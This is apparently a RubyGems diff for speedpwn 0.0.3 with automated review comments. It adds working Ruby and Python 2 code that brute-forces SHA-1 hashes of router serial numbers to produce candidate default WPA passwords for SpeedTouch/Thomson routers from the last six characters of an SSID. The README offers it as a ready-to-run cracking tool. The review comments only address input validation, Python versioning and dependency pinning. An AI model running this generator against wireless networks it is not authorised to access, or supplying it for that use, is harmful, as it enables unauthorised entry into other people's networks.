speedpwn 0.0.2 → 0.0.3
- checksums.yaml +4 -4
- data/.gitignore +5 -0
- data/Gemfile +3 -0
- data/LICENSE +19 -0
- data/MANIFEST +14 -0
- data/README.md +49 -0
- data/Rakefile +7 -0
- data/lib/speedpwn.rb +6 -0
- data/lib/speedpwn/generator.rb +117 -0
- data/lib/speedpwn/version.rb +3 -0
- data/nostalgia/speedpwn.py +107 -0
- data/speedpwn.gemspec +20 -0
- data/task/manifest.rake +8 -0
- data/task/tag.rake +6 -0
- metadata +14 -1
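--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA1:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 3e572c6d9ed7860eba6ac8028c72f231df72829c
+data.tar.gz: 4c6b960438ca7aedab06e027aa5883db135140f0
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 14456e0861ce92817d6b8e5c504111e3c30c9a7a65cc2766ba1da057b5f72d1acca9c499cd3010b9e5de49a786dadc35940f1f92d9124449fcbb6cc871600dab
+data.tar.gz: 27b628c6c09cc57c74dc56b03025100c40fefaf35c409017d1bd03a21407b32941eeb4f0db70f36bcfe7dc589d524fa30b420ebe8f85aa3cd99ea449c20f4822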
data/Gemfile
ADDED
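--- a/data/LICENSE
+++ b/data/LICENSE
@@ -0,0 +1,19 @@
+Copyright (c) 2013, Yorick Peterse
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.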
data/MANIFEST
ADDED
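--- a/data/README.md
+++ b/data/README.md
@@ -0,0 +1,49 @@
+# SpeedPwn
+
+SpeedPwn is a Ruby application that can generate a list of possible passwords
+for SpeedTouch/Thomson routers. BT Home hubs are not supported because they're
+not used here in The Netherlands.
+
+Originally I wrote a Python script (which can be found in
+`nostalgia/speedpwn.py`) some time back in early 2009 to do this and I've used
+it over the years. After using it for almost 4 years I decided it was time I'd
+rewrite it in a decent way.
+
+The algorithm used itself is nothing new and has been around since 2008. More
+information about this can be found on the following webpages:
+
+* <http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/>
+* <http://www.mentalpitstop.com/touchspeedcalc/calculate_speedtouch_default_wep_wpa_wpa2_password_by_ssid.html>
+
+In plain English the algorithm for the default passwords can be described as
+"Very dumb".
+
+## Requirements
+
+* Ruby 1.9.3 or newer
+* OpenSSL
+
+## Installation
+
+Install it from RubyGems:
+
+gem install speedpwn
+
+Unlike other projects this one is not signed in any way. I consider it more of
+a quick hobby/joke project and thus don't really want to bother with signing,
+checksums, etc. Install at your own risk.
+
+## Usage
+
+Once installed, run it and pass the last 6 characters of the SSID:
+
+speedpwn C28B9B
+
+Generating the list of passwords can take a few minutes so go make some
+tea/coffee while you wait for it to complete.
+
+## License
+
+All source code in this repository is licensed under the MIT license unless
+specified otherwise. A copy of this license can be found in the file "LICENSE"
+in the root directory of this repository.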
data/Rakefile
ADDED
data/lib/speedpwn.rb
ADDED
@@ -0,0 +1,117 @@
|
|
1
|
+
module SpeedPwn
|
2
|
+
##
|
3
|
+
# The Generator class takes a SpeedTouch SSID part (the last 6 characters)
|
4
|
+
# and returns an Array containing the possible default passwords for it. This
|
5
|
+
# code is based on the following resources:
|
6
|
+
#
|
7
|
+
# * http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
|
8
|
+
# * http://www.mentalpitstop.com/touchspeedcalc/calculate_speedtouch_default_wep_wpa_wpa2_password_by_ssid.html
|
9
|
+
#
|
10
|
+
# Note that unlike other tools this particular one *only* supports SpeedTouch
|
11
|
+
# routers since BT Home hubs are not used in The Netherlands.
|
12
|
+
#
|
13
|
+
# @!attribute [r] identifier
|
14
|
+
# @return [String]
|
15
|
+
#
|
16
|
+
class Generator
|
17
|
+
attr_reader :identifier
|
18
|
+
|
19
|
+
##
|
20
|
+
# @return [Array]
|
21
|
+
#
|
22
|
+
YEARS = ('04'..(Time.now.strftime('%y'))).to_a
|
23
|
+
|
24
|
+
##
|
25
|
+
# @return [Array]
|
26
|
+
#
|
27
|
+
WEEKS = ('1'..'52').to_a
|
28
|
+
|
29
|
+
##
|
30
|
+
# @return [Array]
|
31
|
+
#
|
32
|
+
CHARACTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'.chars.to_a
|
33
|
+
|
34
|
+
##
|
35
|
+
# @param [String] identifier The last 6 characters of the SSID.
|
36
|
+
#
|
37
|
+
def initialize(identifier)
|
38
|
+
@identifier = identifier
|
39
|
+
@digest = OpenSSL::Digest::SHA1.new
|
40
|
+
end
|
41
|
+
|
42
|
+
##
|
43
|
+
# Sets the block to call whenever a week (= batch) has been processed.
|
44
|
+
#
|
45
|
+
# @param [Proc] block
|
46
|
+
#
|
47
|
+
def finish_batch(&block)
|
48
|
+
@finish_batch = block
|
49
|
+
end
|
50
|
+
|
51
|
+
##
|
52
|
+
# Generates the passwords and returns them as an Array of Strings.
|
53
|
+
#
|
54
|
+
# @return [Array]
|
55
|
+
#
|
56
|
+
def generate
|
57
|
+
passwords = []
|
58
|
+
batch_size = character_combinations.size
|
59
|
+
|
60
|
+
YEARS.each do |year|
|
61
|
+
WEEKS.each do |week|
|
62
|
+
character_combinations.each do |combo|
|
63
|
+
found = generate_password(year, week, combo)
|
64
|
+
|
65
|
+
passwords << found if found
|
66
|
+
end
|
67
|
+
|
68
|
+
@finish_batch.call(batch_size) if @finish_batch
|
69
|
+
end
|
70
|
+
end
|
71
|
+
|
72
|
+
return passwords
|
73
|
+
end
|
74
|
+
|
75
|
+
##
|
76
|
+
# Returns the amount of iterations to run.
|
77
|
+
#
|
78
|
+
# @return [Numeric]
|
79
|
+
#
|
80
|
+
def size
|
81
|
+
return YEARS.size * WEEKS.size * character_combinations.size
|
82
|
+
end
|
83
|
+
|
84
|
+
alias_method :count, :size
|
85
|
+
|
86
|
+
private
|
87
|
+
|
88
|
+
##
|
89
|
+
# @param [String] year
|
90
|
+
# @param [String] week
|
91
|
+
# @param [String] combo
|
92
|
+
# @return [String]
|
93
|
+
#
|
94
|
+
def generate_password(year, week, combo)
|
95
|
+
found = nil
|
96
|
+
serial = "CP#{year}#{week}#{combo}".upcase
|
97
|
+
hash = @digest.hexdigest(serial).upcase
|
98
|
+
|
99
|
+
if hash[-6..-1] == identifier
|
100
|
+
found = hash[0..9]
|
101
|
+
end
|
102
|
+
|
103
|
+
return found
|
104
|
+
end
|
105
|
+
|
106
|
+
##
|
107
|
+
# @return [Array]
|
108
|
+
#
|
109
|
+
def character_combinations
|
110
|
+
@combinations ||= CHARACTERS.permutation(3).map do |group|
|
111
|
+
group.map { |char| char.ord.to_s(16) }.join('')
|
112
|
+
end
|
113
|
+
|
114
|
+
return @combinations
|
115
|
+
end
|
116
|
+
end # Generator
|
117
|
+
end # SpeedPwn
|
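Review bot: `initialize` stores `identifier` exactly as passed, while `generate_password` compares it with `hash[-6..-1]` of an upper-cased hex digest, so a lower-case, whitespace-padded or wrong-length value can never match and the caller only finds out when the full `YEARS` × `WEEKS` × combinations run returns an empty Array. The Python predecessor shipped in this same release strips, upper-cases and length-checks the value before starting; unless the executable already does this (not visible here), the constructor should do the same, e.g. `@identifier = identifier.to_s.strip.upcase` followed by `raise ArgumentError, 'identifier must be 6 hexadecimal characters' unless @identifier =~ /\A[0-9A-F]{6}\z/`. The `@return [String]` tag on `generate_password` should also read `@return [String, nil]`, since the method returns `nil` when the digest suffix does not match. Note that the header above this 117-line hunk reads data/lib/speedpwn.rb, but by the file list's line counts the content appears to be lib/speedpwn/generator.rb.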
@@ -0,0 +1,107 @@
|
|
1
|
+
#!/usr/bin/env python
|
2
|
+
##
|
3
|
+
# Author: Yorick Peterse
|
4
|
+
# Website: http://www.yorickpeterse.com/
|
5
|
+
# Description: SpeedTouch Key is a Python script that generates (possible) keys
|
6
|
+
# for a SpeedTouch Wireless network that uses the default SSID/password
|
7
|
+
# combination based on the serial number.
|
8
|
+
#
|
9
|
+
# Imports
|
10
|
+
from hashlib import sha1
|
11
|
+
from multiprocessing import Process
|
12
|
+
import sys
|
13
|
+
import os
|
14
|
+
import itertools
|
15
|
+
|
16
|
+
# =============================================
|
17
|
+
# ============= 1: Initialization =============
|
18
|
+
# =============================================
|
19
|
+
|
20
|
+
# Fancy boot screen
|
21
|
+
print "==================================\n==== SpeedTouch Key Generator ====\n==================================\n"
|
22
|
+
|
23
|
+
# SSID part
|
24
|
+
ssid_part = raw_input("Enter the last 6 characters of the SSID: ")
|
25
|
+
ssid_part = ssid_part.upper().strip()
|
26
|
+
|
27
|
+
# Validate the SSID part
|
28
|
+
if len(ssid_part) <> 6:
|
29
|
+
print "ERROR: The specified part of the SSID is invalid, it should be exactly 6 characters long"
|
30
|
+
sys.exit()
|
31
|
+
else:
|
32
|
+
pass
|
33
|
+
|
34
|
+
# Required variables in order to generate the serial number
|
35
|
+
production_years = ['04', '05','06','07','08','09','10', '11']
|
36
|
+
production_weeks = range(1,53)
|
37
|
+
|
38
|
+
# Required in order to generate the unit number
|
39
|
+
chars_string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
|
40
|
+
list_items = []
|
41
|
+
unit_numbers = []
|
42
|
+
|
43
|
+
# Convert the string to a list
|
44
|
+
for char in chars_string:
|
45
|
+
list_items.append(char)
|
46
|
+
|
47
|
+
# Dict containing the final results
|
48
|
+
processed_years = []
|
49
|
+
password_dict = {}
|
50
|
+
|
51
|
+
# Get all possible combinations
|
52
|
+
combinations = itertools.permutations(list_items,3)
|
53
|
+
|
54
|
+
# =============================================
|
55
|
+
# ========= 2: Combination generation =========
|
56
|
+
# =============================================
|
57
|
+
|
58
|
+
# Loop through each combination, convert it to a string and add it to the list
|
59
|
+
for combination in combinations:
|
60
|
+
# Convert to string and to hex
|
61
|
+
to_append = '%s%s%s' % (combination[0],combination[1],combination[2])
|
62
|
+
to_append = to_append.encode('hex')
|
63
|
+
|
64
|
+
# Append to the list, but only if it isn't already in there
|
65
|
+
unit_numbers.append(to_append)
|
66
|
+
|
67
|
+
# =============================================
|
68
|
+
# ============ 3: Main application ============
|
69
|
+
# =============================================
|
70
|
+
|
71
|
+
# Generator function
|
72
|
+
def generator(year,weeks,units):
|
73
|
+
# Loop through each week
|
74
|
+
for week in weeks:
|
75
|
+
|
76
|
+
# Loop through each possible unit number
|
77
|
+
for unit in units:
|
78
|
+
# Create the serial number
|
79
|
+
serial = 'CP%s%s%s' % (year,week,unit)
|
80
|
+
serial = serial.upper()
|
81
|
+
|
82
|
+
# Hash the serial using SHA-1
|
83
|
+
serial_hash = sha1(serial).hexdigest().upper()
|
84
|
+
|
85
|
+
# Get the last bit and compare it to the input, print the key if it matches
|
86
|
+
last_bit = serial_hash[-6:]
|
87
|
+
password = serial_hash[:10]
|
88
|
+
|
89
|
+
if last_bit == ssid_part:
|
90
|
+
# Add the password to the dictionary
|
91
|
+
print
|
92
|
+
print " * Possible password: %s" % (password)
|
93
|
+
print " Year: %s" % (year)
|
94
|
+
print " Week: %s" % (week)
|
95
|
+
print " Combo: %s" % (unit)
|
96
|
+
print " Serial: %s" % (serial)
|
97
|
+
|
98
|
+
sys.exit()
|
99
|
+
|
100
|
+
# Main part, this is where most of the work is done
|
101
|
+
# Loop through each year and create a new process
|
102
|
+
if __name__ == '__main__':
|
103
|
+
print "Generating possible passwords..."
|
104
|
+
|
105
|
+
for year in production_years:
|
106
|
+
p = Process(target=generator, args=(year,production_weeks,unit_numbers))
|
107
|
+
p.start()
|
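Review bot: This script is Python 2 only (`print` statements, `raw_input`, the `<>` operator, `str.encode('hex')`) yet its shebang is `#!/usr/bin/env python`, which on many current systems resolves to Python 3 and fails at parse time. Because it is packaged into the gem as a historical copy, the header comment should say so explicitly, for example `# Unmaintained Python 2 original, kept for reference only; use the speedpwn executable instead.`, or the shebang should name `python2`. The comment `# Append to the list, but only if it isn't already in there` also does not match the code beneath it, which calls `unit_numbers.append(to_append)` unconditionally; the comment should be reworded to `# Append to the list`.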
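--- a/data/speedpwn.gemspec
+++ b/data/speedpwn.gemspec
@@ -0,0 +1,20 @@
+require File.expand_path('../lib/speedpwn/version', __FILE__)
+
+Gem::Specification.new do |gem|
+gem.name = 'speedpwn'
+gem.version = SpeedPwn::VERSION
+gem.author = 'Yorick Peterse'
+gem.email = 'yorickpeterse@gmail.com'
+gem.summary = 'Generates possible passwords for SpeedTouch/Thomson routers.'
+gem.description = gem.summary
+gem.executables = ['speedpwn']
+gem.license = 'MIT'
+gem.has_rdoc = 'yard'
+
+gem.required_ruby_version = '>= 1.9.3'
+
+gem.files = File.read(File.expand_path('../MANIFEST', __FILE__)).split("\n")
+
+gem.add_dependency 'slop'
+gem.add_dependency 'progress_bar'
+end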
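Review bot: Both runtime dependencies are declared without any version constraint (`gem.add_dependency 'slop'` and `gem.add_dependency 'progress_bar'`), so `gem install speedpwn` resolves to whatever release is newest at install time, including a later major version with an incompatible API or a release published from a compromised maintainer account. A pessimistic constraint bounds that, e.g. `gem.add_dependency 'slop', '~> X.Y'` and likewise for `progress_bar`, where X.Y is a placeholder for the version the executable was developed against. This matters more here because the README states the gem itself is unsigned, so the dependency declaration is the only place the install is pinned at all. `gem.has_rdoc` is deprecated in RubyGems and can be removed.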
data/task/manifest.rake
ADDED
data/task/tag.rake
ADDED
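--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: speedpwn
 version: !ruby/object:Gem::Version
-version: 0.0.
+version: 0.0.3
 platform: ruby
 authors:
 - Yorick Peterse
@@ -45,7 +45,20 @@ executables:
 extensions: []
 extra_rdoc_files: []
 files:
+- .gitignore
+- Gemfile
+- LICENSE
+- MANIFEST
+- README.md
+- Rakefile
 - bin/speedpwn
+- lib/speedpwn.rb
+- lib/speedpwn/generator.rb
+- lib/speedpwn/version.rb
+- nostalgia/speedpwn.py
+- speedpwn.gemspec
+- task/manifest.rake
+- task/tag.rake
 homepage:
 licenses:
 - MIT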